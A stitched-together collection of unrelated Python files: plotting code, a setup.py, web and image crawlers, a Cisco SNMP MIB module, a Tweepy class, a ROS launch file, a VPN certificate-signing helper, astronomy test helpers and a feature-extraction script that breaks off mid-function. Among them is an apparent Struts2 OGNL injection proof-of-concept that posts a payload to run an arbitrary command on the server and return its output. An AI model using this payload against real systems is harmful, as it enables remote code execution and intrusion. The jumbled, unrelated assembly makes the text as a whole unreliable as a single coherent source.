plt.show()
plt.figure()
plt.plot(t, JL, 'k-', label='JL', linewidth=1.0)
plt.plot(t, AL, 'k-', label='AL', linewidth=2.5)
plt.legend(loc='upper right')
plt.xlabel('Time (day)')
plt.ylabel('Density (mg/L)')
plt.show()
|
#coding:utf-8
'''
测试没有成功
2018/06/27
'''
import sys
import requests
requests.packages.urllib3.disable_warnings()
def poccheck(url, cmd='whoami'):
result = False
header = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36',
'Content-Type': "application/x-www-form-urlencoded"
}
data = "name=${(#o=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#o):((#c=#context['com.opensymphony.xwork2.ActionContext.container']).(#g=#c.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#g.getExcludedPackageNames().clear()).(#g.getExcludedClasses().clear()).(#context.setMemberAccess(#o)))).(#o=@org.apache.EXP.ServletActionContext@getResponse().getOutputStream()).(#p=@java.lang.Runtime@getRuntime().exec('%s')).(@org.apache.commons.io.IOUtils@copy(#p.getInputStream(),#o)).(#o.flush())}&age=1212&__checkbox_bustedBefore=true&description=123" % str(
cmd)
if 'integration' not in url:
url = url + "/EXP-showcase/integration/saveGangster.action"
try:
response = requests.post(url, data=data, headers=header, verify=False, allow_redirects=False)
if response.status_code == 200 and 'EXP-showcase' not in response.content:
result = response.content
except Exception as e:
print str(e)
pass
return result
if __name__ == '__main__':
url = 'http://127.0.0.1:8083/integration/saveGangster.action'
res = poccheck(url)
print res
|
import os
import sys
from setuptools import setup, find_packages, Command
VERSION = __import__("zmqpy").__version__
install_requires = []
try:
import importlib
except ImportError:
install_requires.append("importlib")
is_cpy = sys.version_info
is_pypy = hasattr(sys, "pypy_version_info")
setup(
name="zmqpy",
version=VERSION,
description="Pure Python 0mq bindings.",
license="MIT",
url="https://github.com/asenchi/zmqpy",
author="Curt Micol",
author_email="asenchi@asenchi.com",
zip_safe=False,
packages=find_packages(),
install_requires=install_requires,
classifiers=[
"Development Status :: 2 - Pre-Alpha",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Topic :: Software Development :: Libraries :: Application Frameworks",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
],
)
|
# -*- coding: utf-8 -*-
"""
Created on 2021-03-02 23:42:40
---------
@summary:
---------
@author: Boris
"""
import feapder
class TencentNewsParser(feapder.BatchParser):
"""
注意 这里继承的是BatchParser,而不是BatchSpider
"""
def start_requests(self, task):
task_id = task[0]
url = task[1]
yield feapder.Request(url, task_id=task_id)
def parse(self, request, response):
title = response.xpath("//title/text()").extract_first()
print(self.name, title)
yield self.update_task_batch(request.task_id, 1)
|
import os
from icrawler.builtin import GoogleImageCrawler
from icrawler import ImageDownloader
from six.moves.urllib.parse import urlparse
import base64
def ensure_dir(directory):
if not os.path.exists(directory):
os.mkdir(directory)
class Base64NameDownloader(ImageDownloader):
def get_filename(self, task, default_ext):
url_path = urlparse(task['file_url'])[2]
if '.' in url_path:
extension = url_path.split('.')[-1]
if extension.lower() not in [
'jpg', 'jpeg'
]:
extension = default_ext
else:
extension = default_ext
# works for python 3
filename = base64.b64encode(url_path.encode()).decode()
filename=filename[0:30]
return '{}.{}'.format(filename, extension)
plants_list=['maranta leuconeura erythroneura','phlebodium pseudoaureum','euphorbia trigona rubra','senecio rowleyanus','crassula ovata','Aloe Vera','Haworthia limifolia','euphorbia triangularis','monstera deliciosa','senecio kleiniiformis','fatsia japonica','calathea orbifolia','calathea lancifolia','ficus elastica','oxalis triangularis','chlorophytum comosum vittatum','pilea peperomioides','ficus lyrata','Persea gratissima','tradescantia zebrina','Tradescantia fluminensis Tricolor','Tradescantia pallida','Sansevieria trifasciata','Dracanea marginata','echeveria elegans','dracaea reflexa']
for plant in plants_list:
ensure_dir('./images/'+plant)
google_crawler = GoogleImageCrawler(parser_threads=2, downloader_threads=4,downloader_cls=Base64NameDownloader,storage={'root_dir': './images/'+plant})
google_crawler.crawl(keyword=plant, max_num=100,date_min=None, date_max=None,min_size=(200,200), max_size=None)
|
#
# PySNMP MIB module CISCO-WLAN-MAN-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/CISCO-WLAN-MAN-MIB
# Produced by pysmi-0.3.4 at Wed May 1 12:21:27 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
Integer, ObjectIdentifier, OctetString = mibBuilder.importSymbols("ASN1", "Integer", "ObjectIdentifier", "OctetString")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueSizeConstraint, ValueRangeConstraint, SingleValueConstraint, ConstraintsIntersection, ConstraintsUnion = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueSizeConstraint", "ValueRangeConstraint", "SingleValueConstraint", "ConstraintsIntersection", "ConstraintsUnion")
ciscoMgmt, = mibBuilder.importSymbols("CISCO-SMI", "ciscoMgmt")
ModuleCompliance, ObjectGroup, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "ObjectGroup", "NotificationGroup")
Counter64, Counter32, NotificationType, Unsigned32, iso, ModuleIdentity, IpAddress, MibIdentifier, MibScalar, MibTable, MibTableRow, MibTableColumn, Bits, Gauge32, Integer32, ObjectIdentity, TimeTicks = mibBuilder.importSymbols("SNMPv2-SMI", "Counter64", "Counter32", "NotificationType", "Unsigned32", "iso", "ModuleIdentity", "IpAddress", "MibIdentifier", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Bits", "Gauge32", "Integer32", "ObjectIdentity", "TimeTicks")
DisplayString, TruthValue, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "TruthValue", "TextualConvention")
ciscoWlanManMIB = ModuleIdentity((1, 3, 6, 1, 4, 1, 9, 9, 415))
ciscoWlanManMIB.setRevisions(('2004-03-22 00:00',))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
if mibBuilder.loadTexts: ciscoWlanManMIB.setRevisionsDescriptions(('Initial version of this MIB module.',))
if mibBuilder.loadTexts: ciscoWlanManMIB.setLastUpdated('200403220000Z')
if mibBuilder.loadTexts: ciscoWlanManMIB.setOrganization('Cisco System Inc.')
if mibBuilder.loadTexts: ciscoWlanManMIB.setContactInfo(' Cisco Systems Customer Service Postal: 170 West Tasman Drive, San Jose CA 95134-1706. USA Tel: +1 800 553-NETS Email: cs-dot11@cisco.com')
if mibBuilder.loadTexts: ciscoWlanManMIB.setDescription('This MIB module provides network management and configuration support for IEEE 802.11 Wireless LAN devices. ACRONYMS HTTP Hypertext Transfer Protocol.')
ciscoWlanManMIBNotifs = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 415, 0))
ciscoWlanManMIBObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 415, 1))
ciscoWlanManMIBConform = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 415, 2))
cwmDeviceConfig = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 415, 1, 1))
cwmNetworkConfig = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 415, 1, 2))
cwmHttpServerEnabled = MibScalar((1, 3, 6, 1, 4, 1, 9, 9, 415, 1, 1, 1), TruthValue()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: cwmHttpServerEnabled.setStatus('current')
if mibBuilder.loadTexts: cwmHttpServerEnabled.setDescription("This object enables the HTTP Web server as follows: 'true' - HTTP Web server function is enabled, 'false' - HTTP Web server function is disabled.")
cwmTelnetLoginEnabled = MibScalar((1, 3, 6, 1, 4, 1, 9, 9, 415, 1, 1, 2), TruthValue()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: cwmTelnetLoginEnabled.setStatus('current')
if mibBuilder.loadTexts: cwmTelnetLoginEnabled.setDescription("This object enables the telnet console login as follows: 'true' - telnet console login is enabled, 'false' - telnet console login is disabled.")
ciscoWlanManMIBCompliances = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 415, 2, 1))
ciscoWlanManMIBGroups = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 415, 2, 2))
ciscoWlanManMIBCompliance = ModuleCompliance((1, 3, 6, 1, 4, 1, 9, 9, 415, 2, 1, 1)).setObjects(("CISCO-WLAN-MAN-MIB", "cwmWirelessDeviceGroup"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
ciscoWlanManMIBCompliance = ciscoWlanManMIBCompliance.setStatus('current')
if mibBuilder.loadTexts: ciscoWlanManMIBCompliance.setDescription('The compliance statement for the ciscoWlanManMIB module.')
cwmWirelessDeviceGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 9, 9, 415, 2, 2, 1)).setObjects(("CISCO-WLAN-MAN-MIB", "cwmHttpServerEnabled"), ("CISCO-WLAN-MAN-MIB", "cwmTelnetLoginEnabled"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
cwmWirelessDeviceGroup = cwmWirelessDeviceGroup.setStatus('current')
if mibBuilder.loadTexts: cwmWirelessDeviceGroup.setDescription('Configuration for Wireless LAN Access Points and bridges.')
mibBuilder.exportSymbols("CISCO-WLAN-MAN-MIB", cwmWirelessDeviceGroup=cwmWirelessDeviceGroup, cwmHttpServerEnabled=cwmHttpServerEnabled, cwmTelnetLoginEnabled=cwmTelnetLoginEnabled, ciscoWlanManMIBObjects=ciscoWlanManMIBObjects, ciscoWlanManMIB=ciscoWlanManMIB, cwmNetworkConfig=cwmNetworkConfig, ciscoWlanManMIBConform=ciscoWlanManMIBConform, PYSNMP_MODULE_ID=ciscoWlanManMIB, ciscoWlanManMIBNotifs=ciscoWlanManMIBNotifs, cwmDeviceConfig=cwmDeviceConfig, ciscoWlanManMIBGroups=ciscoWlanManMIBGroups, ciscoWlanManMIBCompliance=ciscoWlanManMIBCompliance, ciscoWlanManMIBCompliances=ciscoWlanManMIBCompliances)
|
# Tweepy
# Copyright 2009-2022 Joshua Roesslein
# See LICENSE for details.
from tweepy.mixins import DataMapping, HashableID
class Place(HashableID, DataMapping):
"""The place tagged in a Tweet is not a primary object on any endpoint, but
can be found and expanded in the Tweet resource.
The object is available for expansion with ``?expansions=geo.place_id`` to
get the condensed object with only default fields. Use the expansion with
the field parameter: ``place.fields`` when requesting additional fields to
complete the object.
.. versionadded:: 4.0
Attributes
----------
data : dict
The JSON data representing the place.
full_name : str
A longer-form detailed place name.
id : str
The unique identifier of the expanded place, if this is a point of
interest tagged in the Tweet.
contained_within : list
Returns the identifiers of known places that contain the referenced
place.
country : str | None
The full-length name of the country this place belongs to.
country_code : str | None
The ISO Alpha-2 country code this place belongs to.
geo : dict | None
Contains place details in GeoJSON format.
name : str | None
The short name of this place.
place_type : str | None
Specified the particular type of information represented by this place
information, such as a city name, or a point of interest.
References
----------
https://developer.twitter.com/en/docs/twitter-api/data-dictionary/object-model/place
"""
__slots__ = (
"data", "full_name", "id", "contained_within", "country",
"country_code", "geo", "name", "place_type"
)
def __init__(self, data):
self.data = data
self.full_name = data["full_name"]
self.id = data["id"]
self.contained_within = data.get("contained_within", [])
self.country = data.get("country")
self.country_code = data.get("country_code")
self.geo = data.get("geo")
self.name = data.get("name")
self.place_type = data.get("place_type")
def __repr__(self):
return f"<Place id={self.id} full_name={self.full_name}>"
def __str__(self):
return self.full_name
|
# Copyright (c) 2020 OUXT Polaris
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from ament_index_python.packages import get_package_share_directory
from launch import LaunchDescription
from launch_ros.actions import Node
from launch.substitutions import LaunchConfiguration
from launch.actions import DeclareLaunchArgument
def generate_launch_description():
robotx_twist_controller_parm_file = LaunchConfiguration(
'robotx_twist_controller_parm_file',
default=os.path.join(
get_package_share_directory('robotx_twist_controller'),
'config', 'robotx_twist_controller.yaml')
)
description = LaunchDescription([
DeclareLaunchArgument(
'robotx_twist_controller_parm_file',
default_value=robotx_twist_controller_parm_file,
description='robotx_twist_controller parameters'
),
Node(
package='robotx_twist_controller',
node_executable='robotx_twist_controller_node',
node_name='robotx_twist_controller',
parameters=[robotx_twist_controller_parm_file],
output='screen')
])
return description
|
from vpncert import vpncert
import smtplib
import os
from email.MIMEMultipart import MIMEMultipart
from email.MIMEBase import MIMEBase
from email.MIMEText import MIMEText
from email.Utils import formatdate
from email import Encoders
from os.path import basename
from glob import glob
import zipfile
from tempfile import mkdtemp
import subprocess
import logging
import os.path
from shutil import move, copy, rmtree
from django.conf import settings
from django.template.loader import render_to_string
from git import *
class repository(object):
def prepare_repository(self):
try:
repo = Repo(settings.KEYPATH)
except InvalidGitRepositoryError:
debug.logging("Initializing a new Git repository")
repo = Repo.init(settings.KEYPATH)
try:
o = repo.remote.origin
logging.debug("Running Git pull")
o.pull()
except:
logging.debug("No origin defined for Git repository")
def finish_repository(self, message):
repo = Repo(settings.KEYPATH)
logging.debug("Running git add")
"""
GitPython's untracked_files doesn't work at the moment. Using subprocess is a workaround
until the official fix can be found from pypi.
"""
args = ["git", "add", "-A"]
pid = subprocess.Popen(args, cwd=settings.KEYPATH)
pid.wait()
index = repo.index
index.commit(message)
try:
o = repo.remote.origin
logging.debug("Running Git push")
o.push()
except:
logging.debug("No origin defined for Git repository")
class sign(object):
def __init__(self, csrfile, username):
self.password = settings.CA_PASSWORD
self.certmanager = vpncert(username)
self.csrfile = csrfile
self.valid = True
if not os.path.exists(csrfile):
self.valid = False
return
status, errors, fields = self.certmanager.validatecert(csrfile)
if not status:
self.valid = False
return
self.fields = fields
self.repository = repository()
def get_cn(self):
if not self.valid:
return
return self.fields["common_name"]
def sign(self):
if not self.valid:
logging.error("Trying to run sign with invalid setup")
return self.valid
self.repository.prepare_repository()
cn = self.fields['common_name']
move(self.csrfile, "%s/%s.csr" % (settings.KEYPATH, cn))
args = ["openssl", "ca", "-batch", "-days", "365", "-out", "%s/%s.crt"
% (settings.KEYPATH, cn), "-in", "%s/%s.csr" % (settings.KEYPATH, cn),
"-md", "sha1", "-config", settings.OPENSSL_CNF_PATH,
"-passin", "pass:%s" % self.password]
pid = subprocess.Popen(args, env=settings.KEY_ENV_VARIABLES)#, stdout=subprocess.PIPE)
(stdoutmsg, stderrmsg) = pid.communicate()
self.repository.finish_repository("Added certificate for %s" % cn)
return (True, stdoutmsg)
def revoke(self):
if not self.valid:
return self.valid
self.repository.prepare_repository()
cn = self.fields['common_name']
if not os.path.exists("%s/%s.crt" % (settings.KEYPATH, cn)):
# No old crt available -> no reason to revoke
return False
args = ["openssl", "ca", "-revoke", "%s/%s.crt"
% (settings.KEYPATH, cn), "-config", settings.OPENSSL_CNF_PATH,
"-passin", "pass:%s" % self.password]
pid = subprocess.Popen(args, env=settings.KEY_ENV_VARIABLES)#, stdout=subprocess.PIPE)
(stdoutmsg, stderrmsg) = pid.communicate()
args = ["openssl", "ca", "-gencrl", "-out", "%s/crl.pem"
% settings.KEYPATH, "-config", settings.OPENSSL_CNF_PATH,
"-passin", "pass:%s" % self.password]
pid = subprocess.Popen(args, env=settings.KEY_ENV_VARIABLES)#, stdout=subprocess.PIPE)
(stdoutmsg, stderrmsg) = pid.communicate()
self.repository.finish_repository("Revoked certificate %s" % cn)
def pack(self):
if not self.valid:
return self.valid
cn = self.fields['common_name']
MACCONF = """client
dev tap
proto udp
remote %s
resolv-retry infinite
nobind
persist-key
persist-tun
ca %s
cert %s.crt
key %s.key
ns-cert-type server
cipher AES-256-CBC
comp-lzo"""
LINUXCONF = """client
dev tap
proto udp
remote %s
resolv-retry infinite
nobind
persist-key
persist-tun
ca /path/to/%s
cert /path/to/%s.crt
key /path/to/%s.key
ns-cert-type server
cipher AES-256-CBC
comp-lzo"""
WINDOWSCONF = """client
dev tap
proto udp
remote %s
resolv-retry infinite
nobind
persist-key
persist-tun
ca %s
cert %s.crt
key %s.key
ns-cert-type server
cipher AES-256-CBC
comp-lzo"""
tempdir = mkdtemp()
for endpoint, name in settings.VPN_ENDPOINTS:
f = open(tempdir+"/futurice-windows-%s.ovpn" % name, "w")
f.write(WINDOWSCONF % (endpoint, settings.CA_PEM_FILE_NAME, cn, cn))
f.close()
f = open(tempdir+"/futurice-mac-%s.conf" % name, "w")
f.write(MACCONF % (endpoint, settings.CA_PEM_FILE_NAME, cn, cn))
f.close()
f = open(tempdir+"/futurice-linux-%s.conf" % name, "w")
f.write(LINUXCONF % (endpoint, settings.CA_PEM_FILE_NAME, cn, cn))
f.close()
copy("%s/%s.crt" % (settings.KEYPATH, cn), tempdir+"/%s.crt" % cn)
copy("%s/%s" % (settings.KEYPATH, settings.CA_PEM_FILE_NAME), "%s/%s"
% (tempdir, settings.CA_PEM_FILE_NAME))
zip = zipfile.ZipFile(settings.PROJECT_ROOT + "/vpn/static/zip/%s.zip"
% cn, "w")
for filename in glob("%s/*" % tempdir):
zip.write(filename, basename(filename))
zip.close()
rmtree(tempdir)
def send(self, email):
if not self.valid:
return self.valid
cn = self.fields['common_name']
text = render_to_string('mails/sertificate_confirm.txt')
msg = MIMEMultipart()
msg['From'] = settings.EMAIL_FROM
msg['To'] = email
msg['Date'] = formatdate(localtime=True)
msg['Subject'] = settings.SERTIFICATE_MAIL_SUBJECT % cn
msg.attach( MIMEText(text) )
zip_filename = settings.PROJECT_ROOT + "/vpn/static/zip/%s.zip" % cn
logging.debug("Adding mime attachment from %s" % zip_filename)
part = MIMEBase('application', "octet-stream")
part.set_payload( open(zip_filename, "rb").read() )
Encoders.encode_base64(part)
part.add_header('Content-Disposition', 'attachment; filename="%s.zip"' % cn)
msg.attach(part)
logging.debug("Sending email to %s with subject %s"
% (msg["To"], msg["Subject"]))
smtp = smtplib.SMTP(settings.SMTP)
smtp.sendmail(settings.EMAIL_FROM, email, msg.as_string())
smtp.close()
|
# -*- coding: utf-8 -*-
"""
Copyright (c) 2010-2018 CNRS / Centre de Recherche Astrophysique de Lyon
Copyright (c) 2016-2018 Simon Conseil <simon.conseil@univ-lyon1.fr>
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its contributors
may be used to endorse or promote products derived from this software
without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
import astropy.units as u
import numpy as np
import os
from mpdaf.obj import Image, Cube, WCS, WaveCoord, Spectrum
from numpy.testing import assert_array_equal, assert_allclose
from os.path import join
DEFAULT_SHAPE = (10, 6, 5)
DATADIR = join(os.path.abspath(os.path.dirname(__file__)), '..', 'data')
def get_data_file(*paths):
return join(DATADIR, *paths)
def assert_image_equal(ima, shape=None, start=None, end=None, step=None):
"""Raise an assertion error if the characteristics of a given image
don't match the specified parameters.
Parameters
----------
ima : `mpdaf.obj.Image`
The image to be tested.
shape : tuple
The shape of the data array of the image.
start : tuple
The [y,x] coordinate of pixel [0,0].
end : tuple
The [y,x] coordinate of pixel [-1,-1].
step : tuple
The pixel step size in [x,y].
"""
if shape is not None:
assert_array_equal(ima.shape, shape)
if start is not None:
assert_array_equal(ima.get_start(), start)
if end is not None:
assert_array_equal(ima.get_end(), end)
if step is not None:
assert_array_equal(ima.get_step(), step)
def assert_masked_allclose(d1, d2, **kwargs):
"""Compare the values of two masked arrays"""
if d1 is not None or d2 is not None:
# Check that the two arrays have the same shape.
assert_array_equal(d1.shape, d2.shape)
# Check that they have identical masks.
if d1.mask is np.ma.nomask or d2.mask is np.ma.nomask:
assert d2.mask is d1.mask
else:
assert_array_equal(d1.mask, d2.mask)
# Check that unmasked values in the array are approximately equal.
assert_allclose(np.ma.filled(d1, 0.0), np.ma.filled(d2, 0.0), **kwargs)
def _generate_test_data(data=2.3, var=1.0, mask=None, shape=None, unit=u.ct,
uwave=u.angstrom, wcs=None, wave=None, copy=True,
ndim=None, crpix=2.0, cdelt=3.0, crval=0.5):
# Determine a shape for the data and var arrays. This is either a
# specified shape, the shape of a specified data or var array, or
# the default shape.
if shape is None:
if isinstance(data, np.ndarray):
shape = data.shape
ndim = data.ndim
elif isinstance(var, np.ndarray):
shape = var.shape
ndim = var.ndim
elif isinstance(mask, np.ndarray):
shape = mask.shape
ndim = mask.ndim
elif ndim is not None:
if ndim == 1:
shape = DEFAULT_SHAPE[0]
elif ndim == 2:
shape = DEFAULT_SHAPE[1:]
elif ndim == 3:
shape = DEFAULT_SHAPE
else:
raise ValueError('Missing shape/ndim specification')
if np.isscalar(shape):
shape = (shape,)
if len(shape) != ndim:
raise ValueError('shape does not match the number of dimensions')
# Convert the data and var arguments to ndarray's
if data is None:
if ndim == 1:
# Special case for spectra ...
data = np.arange(shape[0], dtype=float)
data[0] = 0.5
elif np.isscalar(data):
data = data * np.ones(shape, dtype=type(data))
elif data is not None:
data = np.array(data, copy=copy)
assert shape == data.shape
if np.isscalar(var):
var = var * np.ones(shape, dtype=type(var))
elif var is not None:
var = np.array(var, copy=copy)
assert shape == var.shape
if mask is None:
mask = False
if not np.isscalar(mask):
mask = np.array(mask, copy=copy, dtype=bool)
assert shape == mask.shape
# Substitute default world-coordinates where not specified.
if ndim == 2:
wcs = wcs or WCS(crval=(0, 0), crpix=1.0, shape=shape)
elif ndim == 3:
wcs = wcs or WCS(crval=(0, 0), crpix=1.0, shape=shape[1:])
# Substitute default wavelength-coordinates where not specified.
if ndim in (1, 3):
wave = wave or WaveCoord(crpix=crpix, cdelt=cdelt, crval=crval,
shape=shape[0], cunit=uwave)
if wave.shape is None:
wave.shape = shape[0]
if ndim == 1:
cls = Spectrum
elif ndim == 2:
cls = Image
elif ndim == 3:
cls = Cube
return cls(data=data, var=var, mask=mask, wave=wave, wcs=wcs,
unit=unit, copy=copy, dtype=None)
def generate_image(data=2.0, var=1.0, mask=None, shape=None,
unit=u.ct, wcs=None, copy=True):
"""Generate a simple image for unit tests.
The data array can either be specified explicitly, or its shape
can be specified along with a constant value to assign to its
elements. Similarly for the variance and mask arrays. If one or
more of the data, var or mask array arguments are provided, their
shapes must match each other and the optional shape argument.
Parameters
----------
data : float or numpy.ndarray
Either a 2D array to assign to the image's data array, or a float
to assign to each element of the data array.
var : float or numpy.ndarray
Either a 2D array to assign to the image's variance array, a float
to assign to each element of the variance array, or None if no
variance array is desired.
mask : Either a 2D boolean array to use to mask the data array, a
boolean value to assign to each element of the mask array, or
None, to indicate that all data values should be left unmasked.
shape : tuple of 2 integers
Either None, or the shape to give the data and variance arrays.
If either data or var are arrays, this must match their shape.
If shape==None and neither data nor var are arrays, (6,5) is used.
unit : `astropy.units.Unit`
The units of the data.
wcs : `mpdaf.obj.WCS`
The world coordinates of image pixels.
copy : boolean
If true (default), the data, variance and mask arrays are copied.
"""
return _generate_test_data(data=data, var=var, mask=mask, shape=shape,
unit=unit, wcs=wcs, copy=copy, ndim=2)
def generate_spectrum(data=None, var=1.0, mask=None, shape=None,
uwave=u.angstrom, crpix=2.0, cdelt=3.0,
crval=0.5, wave=None, unit=u.ct, copy=True):
"""Generate a simple spectrum for unit tests.
The data array can either be specified explicitly, or its shape
can be specified along with a constant value to assign to its
elements. Similarly for the variance and mask arrays. If one or
more of the data, var or mask array arguments are provided, their
shapes must match each other and the optional shape argument.
Parameters
----------
data : float or numpy.ndarray
Either a 1D array to assign to the spectrum's data array,
a float to assign to each element of the data array, or
None to substitute the default spectrum (0.5, 1, 2, 3 ...).
var : float or numpy.ndarray
Either a 1D array to assign to the spectrum's variance array,
a float to assign to each element of the variance array,
or None if no variance array is desired.
mask : Either a 1D boolean array to use to mask the data array, a
boolean value to assign to each element of the mask array, or
None, to indicate that all data values should be left unmasked.
shape : int
Either None, or the size to give the data and variance arrays.
If either data, var or mask are arrays, this must match their shape.
If shape==None and neither data, var, nor mask are arrays, 10 is used.
uwave : `astropy.units.Unit`
The units to use for wavelengths.
crpix : float
The reference pixel of the spectrum.
cdelt : float
The step in wavelength between pixels.
crval : float
The wavelength of the reference pixel.
wave : `mpdaf.obj.WaveCoord`
The wavelength coordinates of spectral pixels.
unit : `astropy.units.Unit`
The units of the data.
copy : boolean
If true (default), the data, variance and mask arrays are copied.
"""
return _generate_test_data(data=data, var=var, mask=mask, shape=shape,
uwave=uwave, wave=wave, copy=copy, ndim=1,
crpix=crpix, cdelt=cdelt, crval=crval)
def generate_cube(data=2.3, var=1.0, **kwargs):
"""Generate a simple cube for unit tests.
The data array can either be specified explicitly, or its shape
can be specified along with a constant value to assign to its
elements. Similarly for the variance and mask arrays. If one or
more of the data, var or mask array arguments are provided, their
shapes must match each other and the optional shape argument.
Parameters
----------
data : float or numpy.ndarray
Either a 3D array to assign to the cube's data array, or a float
to assign to each element of the data array.
var : float or numpy.ndarray
Either a 3D array to assign to the cube's variance array, a float
to assign to each element of the variance array, or None if no
variance array is desired.
mask : Either a 3D boolean array to use to mask the data array, a
boolean value to assign to each element of the mask array, or
None, to indicate that all data values should be left unmasked.
shape : tuple of 3 integers
Either None, or the shape to give the data and variance arrays.
If either data or var are arrays, this must match their shape.
If shape==None and neither data nor var are arrays, (10,6,5) is used.
uwave : `astropy.units.Unit`
The units to use for wavelengths.
unit : `astropy.units.Unit`
The units of the data.
wcs : `mpdaf.obj.WCS`
The world coordinates of image pixels.
wave : `mpdaf.obj.WaveCoord`
The wavelength coordinates of spectral pixels.
copy : boolean
If true (default), the data, variance and mask arrays are copied.
"""
return _generate_test_data(data=data, var=var, ndim=3, **kwargs)
|
with open("Output.ini", "a") as text_file:
text_file.write("\nPurchase Amount: %s" % 5)
with open("Output.ini", "r") as text_file:
print text_file.read()
|
# coding=utf-8
# Copyright 2015 Square, Inc.
from __future__ import print_function, with_statement
import logging
from pants.task.task import Task
from textwrap import dedent
logger = logging.getLogger(__name__)
class ShowNewIdeaMovedMessage(Task):
"""Displays a message letting people know that the new-idea goal has been renamed."""
def execute(self):
self.context.log.info(dedent('''
The "./pants new-idea" goal has been promoted and is now just "./pants idea".
The previous, deprecated idea goal is now "./pants old-idea".
You may need to update any flags or options you have set (eg, --new-idea-project-name is now
just --idea-project-name).
'''))
self.context.log.error('Please re-run ./pants using "idea" instead of "new-idea".\n')
|
# -*- coding: utf-8 -*-
# @Author : liaozhi
# @Time : 2021-07-01
# @Contact : liaozhi_edo@163.com
"""
特征
"""
# packages
import numpy as np
from config import *
from sklearn.preprocessing import LabelEncoder, OneHotEncoder, MinMaxScaler
def extract_features(df, action):
"""
提取特征
:param df: DataFrame 样本(训练和测试)
:param action: str action
:return:
x: DataFrame 特征
y: Series 标签
"""
# 特征-训练每个任务都需要初始化
DENSE_FEATURE_COLUMNS = ['videoplayseconds']
# 1,特征处理
# dense
df.fillna(value={f: 0.0 for f in DENSE_FEATURE_COLUMNS}, inplace=True)
df[DENSE_FEATURE_COLUMNS] = np.log(1.0 + df[DENSE_FEATURE_COLUMNS]) # 平滑
mms = MinMaxScaler(feature_range=(0, 1))
df[DENSE_FEATURE_COLUMNS] = mms.fit_transform(df[DENSE_FEATURE_COLUMNS]) # 归一化
# one-hot也是dense的一种,只是不需要进行平滑和归一化
for col in ONE_HOT_COLUMNS:
df[col] += 1
df.fillna(value={col: 0}, inplace=True)
encoder = OneHotEncoder(sparse=False)
tmp = encoder.fit_transform(df[[col]])
for idx in range(tmp.shape[1]):
DENSE_FEATURE_COLUMNS.append(str(col) + '_' + str(idx))
df[str(col) + '_' + str(idx)] = tmp[:, idx]
# 数据类型转化
df[DENSE_FEATURE_COLUMNS] = df[DENSE_FEATURE_COLUMNS].astype('float32')
# varlen sparse
df = df.merge(FEED_TAG, on=['feedid'], how='left')
df = df.merge(FEED_KEYWORD, on=['feedid'], how='left')
# sparse
for col in SPARSE_FEATURE_COLUMNS:
if col == 'userid':
pass
elif col == 'feedid':
df[col] = df[col].apply(lambda x: FEEDID_MAP.get(x, 0))
elif col == 'feed':
df[col] = df[col].apply(lambda x: FEED_MAP.get(x, 0))
elif col == 'authorid':
pass
else:
df[col] += 1 # 0 用于填未知
df.fillna(value={col: 0}, inplace=True)
le = LabelEncoder()
df[col] = le.fit_transform(df[col])
# 2,格式化输出
